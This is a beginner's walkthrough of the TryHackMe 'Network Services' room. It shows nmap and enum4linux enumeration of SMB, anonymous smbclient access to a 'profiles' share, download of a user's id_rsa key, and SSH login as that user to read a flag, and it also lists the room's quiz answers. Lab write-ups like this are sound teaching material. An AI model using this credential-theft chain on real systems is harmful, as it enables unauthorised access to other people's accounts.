TryHackMe — Network Services
To the uninitiated, TryHackMe is an online platform where you can learn/practice/challenge in the area of cyber-security. A full-blown intro about the same would require a separate story, so if interested do explore it out.
I am currently enrolled in the Complete Beginner learning path, and trust me it has opened the domain of cyber-security from a shady, dark movie cult to an actual branch of engineering using all the more rigorous practices as required in any other discipline of Computer Science & Engineering. This is a writeup where I will be walking through the room Network Services. I won’t be repeating the theory until and unless absolutely required as TryHackMe rooms do a pretty great job at that, so without much ado let’s start.
Task1 Get Connected
Like most of the TryHackMe rooms, it describes a brief summary of what is to be expected and what are the pre-requisites for this room. At this point, it would be a good idea to set up your VPN
Task2 Understanding SMB
The section sports a 10k ft overview of what SMB is. Now in our case, we need not be a master of SMB, but still, it is advised that you go through the inner functionality to at least understand what SMB is from a much deeper POV than presented in this room.
Q1 What Does SMB stands for?
SERVER MESSAGE BLOCK
Q2 What type of protocol is SMB?
RESPONSE-REQUEST
Q3 What do clients connect to server using?
TCP/IP
Q4 What systems does Samba runs on?
UNIX
Task3 Enumerating SMB
Now, this task is where you will start getting some practical challenges. Before you venture ahead it is expected that you are familiar with nmap, as we will be using it a lot in this and the later section. Also if you are using Linux(which you definitely should) there is one more tool at your disposal i.e Enum4linux, It’s a better idea to practice the nmap room if you haven’t yet.
Before moving ahead, make sure you are connected to the VPN and you have deployed the target machine. I prefer using my own VM over the attack box provided by TryHackMe, but you can go ahead with your preferred setup.
Q1 Conduct a nmap scan of your choosing, How many ports are open?
3
When it comes to checking no. of ports I always prefer to start with the fastest time template. In order to solve this, I used the following
sudo nmap -v -sS -T5 MACHINE_IP
It’s lucky that the ping sweep didn’t fail else we would have had to put in the flag -Pn. Now I am using a fast time template since this is just a tutorial, but in real life, I would prefer using slower time templates for better accuracy. Also no matter what -sS is a flag you should be using most of the time since it prevents some of the IDS to block our IP via TCP Handshake information.
Q2 What ports is SMB running on?
139/445
I will be frank I was not able to understand the question properly on this one, and I thought the answer is of the following format PORT/TCP. This is my bad assumption which I was able to clarify from the try hack me discord, where a mod told me that the answer format is
there are 2 ports separated by a /
With this clarity, I went back to the output of my previous scan and found out the 2 ports
Q3 Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
WORKGROUP
In order to solve this, 1st you need to make sure you have Enum4Linux installed in your system, you basically need to clone the repo and make sure that you have smbclient installed on your system. Steps to install are
sudo apt install smbclient
Then run the enum4linux script
./enum4linux.pl -a MACHINE_IP
For workgroup related info check the following section
Enumerating Workgroup/Domain on MACHINE_IP
Q4 What comes up as the name of the machine?
POLOSMB
Q5 What operating system version is running?
6.1
In order to find the above 2 information, you need to check the following section of the enum4linux output
OS information on MACHINE_IP
Q6 What share sticks out as something we might want to investigate?
profiles
So it seems that there is a share that stores the user profiles. This is something you might want to investigate cause it has the possibility of you getting access to user profiles, leading you to control the user environment on the host.
Task4 Exploiting SMB
This room is the last and final installment of using a known vulnerability with SMB and using smbclient to perform an exploit.
Q1 What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 139
Q2 Does the share allow anonymous access? Y/N?
Y
In order to solve this, you just have to see if anonymous access is available in the given target machine or not.
smbclient //MACHINE_IP/profiles -U anonymous -p 139
This command though asks for a password but an empty password works and you get a shell!!
Q3 Who can we assume this profile folder belongs to?
John Cactus
Q4 What service has been configured to allow him to work from home?
ssh
Now, these two are not so straightforward, at first, we need to log in as the anonymous user and find anything that can connect back to the user. Upon logging in and performing an ls command, we see a file that strikes out namely Working From Home Information.txt, we can download this file to our local box by using
get “Working From Home Information.txt” FlaggedFile.txt
Now you can exit and do a
cat FlaggedFile.txt
And check for the required info
Q5 What directory on the share should we look in?
.ssh
This is expected as all ssh keys are generally stored in the ~/.ssh directory, if we can download the private key of any user, we can essentially mimick him
Q6 Which of these keys is most useful to us?
id_rsa
This is a default file name given to the identity file generated by the ssh-keygen utility that ships with most of the Linux distributions.
Q7 What is the smb.txt flag?
<FLAG>
We already have done the groundwork for getting the answer to this, since we have the user’s ssh key pair we can log in to his account and read the file to get the answer. In order to identify what is the username on the system, we can use the id_rsa.pub, the last part gives us the username required to log in, and we already have the identity file, so use the following command
ssh -i id_rsa cactus@MACHINE_IP
Now a simple cat shows us the required flag.
With this we have finished the SMB exploitation task, hope you guys find it interesting, please provide any feedback. I will be posting the rest of the tasks in their separate post.
Happy hacking!!
